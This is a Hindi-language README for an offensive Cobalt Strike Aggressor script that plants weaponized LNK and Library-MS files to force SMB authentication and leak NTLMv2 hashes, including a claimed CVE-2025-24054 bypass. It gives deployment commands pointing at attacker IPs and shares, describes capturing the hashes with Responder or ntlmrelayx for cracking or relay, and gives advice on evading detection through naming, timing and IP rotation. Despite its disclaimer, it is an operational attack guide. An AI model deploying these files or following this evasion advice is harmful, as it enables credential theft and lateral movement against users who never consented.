LNK Weaponizer - Cobalt Strike Aggressor Script
एक व्यापक Cobalt Strike Aggressor स्क्रिप्ट जो SMB NTLMv2-SSP हैश प्रकटीकरण के लिए दुर्भावनापूर्ण LNK फ़ाइलों और Library-MS फ़ाइलों को हथियारबंद और निष्पादित करती है। इसमें CVE-2025-24054 बायपास तकनीक शामिल है।
⚠️ अस्वीकरण
यह उपकरण केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है। लेखक इस कोड के किसी भी दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है। केवल उन प्रणालियों पर उपयोग करें जिनके आप स्वामी हैं या जिनके परीक्षण की स्पष्ट अनुमति है।
NTLM हैश कैप्चर करना
यह स्क्रिप्ट हथियारबंद .lnk और .library-ms फ़ाइलें उत्पन्न करती है जो खोले जाने पर ऑपरेटर के होस्ट पर SMB प्रमाणीकरण ट्रिगर करती हैं।
लीक हुए NTLMv2 हैश Cobalt Strike में नहीं दिखाए जाते, बल्कि हमलावर सिस्टम पर चल रहे Responder, Impacket के ntlmrelayx.py या Inveigh जैसे बाहरी उपकरणों के साथ कैप्चर किए जाने चाहिए।
एकत्रित होने के बाद, हैश को Hashcat के साथ क्रैक किया जा सकता है या आगे लेटरल मूवमेंट के लिए रिले किया जा सकता है।
🎯 विशेषताएं
- LNK फ़ाइल हथियारबंदी: NTLM हैश कैप्चर के लिए दुर्भावनापूर्ण शॉर्टकट फ़ाइलें बनाता है
- Library-MS फ़ाइल निर्माण: CVE-2025-24054 बायपास तकनीक लागू करता है
- राइट-क्लिक मेनू एकीकरण: Cobalt Strike के बीकन संदर्भ मेनू के माध्यम से आसान पहुंच
- कमांड-लाइन इंटरफ़ेस: स्वचालन और स्क्रिप्टिंग के लिए सीधे आदेश
- इंटरैक्टिव डायलॉग: उपयोगकर्ता-अनुकूल पैरामीटर इनपुट
- त्वरित तैनाती: त्वरित तैनाती के लिए पूर्व-कॉन्फ़िगर सेटिंग्स
- वैश्विक कॉन्फ़िगरेशन: डिफ़ॉल्ट सेटिंग्स का आसान अनुकूलन
📁 परियोजना संरचना
cobalt-strike-aggressor/
├── lnk_weaponizer.cna # मुख्य Aggressor स्क्रिप्ट (v2.0)
├── standalone_lnk_weaponizer.ps1 # स्टैंडअलोन PowerShell संस्करण
├── README.md # यह दस्तावेज़ीकरण
├── INSTALL.md # स्थापना और सेटअप गाइड
└── examples/
├── usage_scenarios.md # व्यावहारिक उपयोग उदाहरण
└── sample_targets.csv # नमूना बैच संचालन फ़ाइल
🚀 स्थापना
lnk_weaponizer.cna को अपनी Cobalt Strike Aggressor स्क्रिप्ट्स निर्देशिका में कॉपी करें
- Cobalt Strike में स्क्रिप्ट लोड करें:
Cobalt Strike → Script Manager पर जाएं
Load पर क्लिक करें और lnk_weaponizer.cna चुनें
- स्क्रिप्ट स्वचालित रूप से आरंभ हो जाएगी और उपलब्ध आदेश दिखाएगी
📖 उपयोग
राइट-क्लिक मेनू विकल्प
Cobalt Strike में किसी भी बीकन पर राइट-क्लिक करें:
- Create LNK File: कस्टम LNK निर्माण के लिए इंटरैक्टिव डायलॉग
- Create Library-MS File: Library-MS निर्माण के लिए इंटरैक्टिव डायलॉग (CVE-2025-24054 बायपास)
- Quick LNK (Default Settings): पूर्व-निर्धारित मानों के साथ त्वरित LNK तैनाती
- Quick Library-MS (Default Settings): पूर्व-निर्धारित मानों के साथ त्वरित Library-MS तैनाती
कमांड-लाइन आदेश
LNK फ़ाइल आदेश
# कस्टम पैरामीटर के साथ LNK फ़ाइल बनाएं
lnk_create <path> <ip> <share> <file>
# उदाहरण
lnk_create C:\Temp 192.168.1.10 share payload.exe
Library-MS फ़ाइल आदेश
# कस्टम पैरामीटर के साथ Library-MS फ़ाइल बनाएं
library_create <path> <ip> <share>
# उदाहरण
library_create C:\Temp 10.10.14.22 share
त्वरित आदेश
# डिफ़ॉल्ट सेटिंग्स का उपयोग करें
lnk_quick
library_quick
# सहायता दिखाएं
lnk_help
🔧 कॉन्फ़िगरेशन
डिफ़ॉल्ट सेटिंग्स
स्क्रिप्ट इन कॉन्फ़िगरेबल डिफ़ॉल्ट मानों का उपयोग करती है:
- IP:
192.168.1.10
- Share:
share
- Path:
C:\Temp
डिफ़ॉल्ट को अनुकूलित करना
lnk_weaponizer.cna में वैश्विक चर संपादित करें:
global('$default_ip $default_share $default_path');
$default_ip = "192.168.1.10";
$default_share = "share";
$default_path = "C:\\Temp";
🎯 यह कैसे काम करता है
LNK फ़ाइल तकनीक
- PowerShell स्क्रिप्ट जनरेशन: एक PowerShell स्क्रिप्ट बनाता है जो दुर्भावनापूर्ण LNK फ़ाइल उत्पन्न करती है
- LNK फ़ाइल निर्माण: दूरस्थ SMB स्थान की ओर इंगित करने वाला शॉर्टकट बनाने के लिए Windows Shell COM ऑब्जेक्ट का उपयोग करता है
- आइकन ट्रिगरिंग: Explorer को दूरस्थ बाइनरी से PE आइकन लाने के लिए बाध्य करता है, जिससे NTLM प्रमाणीकरण ट्रिगर होता है
- हैश कैप्चर: जब उपयोगकर्ता फ़ाइल के साथ इंटरैक्ट करता है तो NTLMv2-SSP हैश कैप्चर हो जाता है
Library-MS तकनीक (CVE-2025-24054 बायपास)
- XML जनरेशन: UNC पथ संदर्भ के साथ Library-MS XML फ़ाइल बनाता है
- फ़ाइल निर्माण: लक्ष्य निर्देशिका में
.library-ms फ़ाइल उत्पन्न करता है
- उपयोगकर्ता इंटरैक्शन: जब उपयोगकर्ता Library-MS फ़ाइल पर डबल-क्लिक करता है, Windows UNC पथ तक पहुंचने का प्रयास करता है
- प्रमाणीकरण ट्रिगर: SMB प्रमाणीकरण ट्रिगर होता है, NTLM हैश कैप्चर करता है
तकनीकी विवरण
दोनों तकनीकें ऐसी फ़ाइलें बनाती हैं जो:
- दूरस्थ SMB स्थानों की ओर इंगित करती हैं
- एक्सेस होने पर प्रमाणीकरण ट्रिगर करती हैं
- सामान्य सुरक्षा नियंत्रणों को बायपास करती हैं
- विश्वसनीय हैश कैप्चर प्रदान करती हैं
📊 आउटपुट प्रारूप
स्क्रिप्ट विस्तृत लॉगिंग प्रदान करती है:
[+] Creating LNK file on TARGET-COMPUTER
[+] Target UNC: \\192.168.1.10\share\payload.exe
[+] Local Path: C:\Temp
[+] LNK weaponization completed
[!] Wait for user to click the LNK file to capture NTLM hash
🛡️ सुरक्षा संबंधी विचार
पहचान से बचाव
- वैध दिखने वाले शेयर नाम और पथ का उपयोग करें
- पहचान से बचने के लिए तैनाती के समय पर विचार करें
- सुरक्षा उपकरण अलर्ट की निगरानी करें
- Library-MS तकनीक अतिरिक्त चोरी प्रदान करती है
परिचालन सुरक्षा
- हैश संग्रह के लिए समर्पित SMB सर्वर का उपयोग करें
- उचित लॉगिंग और निगरानी लागू करें
- अपने संगठन की रेड टीम प्रक्रियाओं का पालन करें
- सभी परीक्षण गतिविधियों का दस्तावेज़ीकरण करें
कानूनी अनुपालन
- परीक्षण से पहले उचित प्राधिकरण सुनिश्चित करें
- सभी परीक्षण गतिविधियों का दस्तावेज़ीकरण करें
- दायरे और सीमाओं का सम्मान करें
🔍 समस्या निवारण
सामान्य समस्याएं
-
बीकन नहीं मिला
- सुनिश्चित करें कि लक्ष्य कंप्यूटर पर एक सक्रिय बीकन है
- बैच संचालन में कंप्यूटर नाम की वर्तनी जांचें
-
अनुमति अस्वीकृत
- लक्ष्य पथ पर लिखने की अनुमति सत्यापित करें
- लक्ष्य सिस्टम पर UAC सेटिंग्स जांचें
-
PowerShell निष्पादन नीति
- स्क्रिप्ट प्रतिबंधों को संभालने के लिए
bpowershell() का उपयोग करती है
- सुनिश्चित करें कि लक्ष्य पर PowerShell उपलब्ध है
डीबग मोड
स्क्रिप्ट को संशोधित करके वर्बोज़ आउटपुट सक्षम करें:
# डीबग लॉगिंग जोड़ें
blog($bid, "[DEBUG] Executing command: " . $command);
📝 उदाहरण
परिदृश्य 1: LNK फ़ाइल तैनाती
# विशिष्ट लक्ष्य पर LNK फ़ाइल बनाएं
lnk_create C:\Users\Public\Desktop 10.0.0.5 public malware.exe
परिदृश्य 2: Library-MS बायपास
# CVE-2025-24054 बायपास के लिए Library-MS फ़ाइल बनाएं
library_create C:\Users\Public\Desktop 192.168.1.100 share
परिदृश्य 3: त्वरित हमला
# तीव्र तैनाती के लिए डिफ़ॉल्ट सेटिंग्स का उपयोग करें
lnk_quick
library_quick
🔬 उन्नत तकनीकें
CVE-2025-24054 बायपास
Library-MS तकनीक CVE-2025-24054 के लिए एक बायपास लागू करती है:
- पारंपरिक LNK फ़ाइलों के बजाय Library-MS फ़ाइल प्रारूप का उपयोग करना
- प्रमाणीकरण ट्रिगर के लिए Windows Library प्रणाली का लाभ उठाना
- अतिरिक्त चोरी क्षमताएं प्रदान करना
चोरी रणनीतियाँ
- फ़ाइल नामकरण: यथार्थवादी नाम और एक्सटेंशन का उपयोग करें
- पथ चयन: सामान्य उपयोगकर्ता निर्देशिकाओं में तैनात करें
- समय: सामान्य व्यावसायिक घंटों के दौरान निष्पादित करें
- रोटेशन: SMB सर्वर IP और शेयर नाम बदलें
🤝 योगदान
- रिपॉजिटरी को फोर्क करें
- एक फीचर ब्रांच बनाएं
- अपने बदलाव करें
- अच्छी तरह से परीक्षण करें
- एक पुल अनुरोध सबमिट करें
📄 लाइसेंस
यह परियोजना शैक्षिक उद्देश्यों के लिए जैसी है वैसी प्रदान की गई है। जिम्मेदारी से और लागू कानूनों और विनियमों के अनुसार उपयोग करें।
🙏 आभार
- Aggressor ढांचे के लिए Cobalt Strike टीम
- परीक्षण और प्रतिक्रिया के लिए रेड टीम समुदाय
- LNK-आधारित हमलों का बीड़ा उठाने वाले सुरक्षा शोधकर्ता
- CVE-2025-24054 अनुसंधान में योगदानकर्ता
याद रखें: किसी भी सिस्टम पर परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।